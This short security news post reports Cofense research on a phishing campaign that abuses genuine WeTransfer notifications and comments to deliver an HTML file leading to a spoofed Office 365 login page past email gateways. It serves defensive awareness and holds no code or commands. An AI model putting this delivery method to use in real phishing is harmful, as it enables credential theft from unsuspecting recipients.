A phishing campaign is abusing the legitimate file hosting site WeTransfer to get malicious links through email filters, according to Jake Longden at Cofense. The attackers send real WeTransfer notifications via email, which inform recipients that someone has shared a file with them.
WeTransfer notifications let users include a comment in such emails to give the link context, and attackers are using this feature to tell the victim that the file is important.
When a victim clicks the link to receive their file, they’ll be taken to a WeTransfer page that will in turn download an HTML file. Opening this file will take the victim to the phishing page, which in this case spoofs an Office 365 login page.
The important thing to note here is that the entire delivery method is legitimate, so most email filters aren’t watching out for this behavior.
“As WeTransfer is a well-known and trusted file hosting system, used to share files too large to attach to an email, these links will typically bypass gateways as benign emails, unless settings are modified to restrict access to such file sharing sites,” Longden writes. “The PDC has observed this attack method to bypass multiple gateways.”
As security technologies adapt to known vectors of attack, threat actors are increasingly taking advantage of legitimate services to carry out phishing attacks. New-school security awareness training can help your employees keep up with new phishing techniques. Source: https://cofense.com/phishing-attackers-abusing-wetransfer-evade-email-gateways/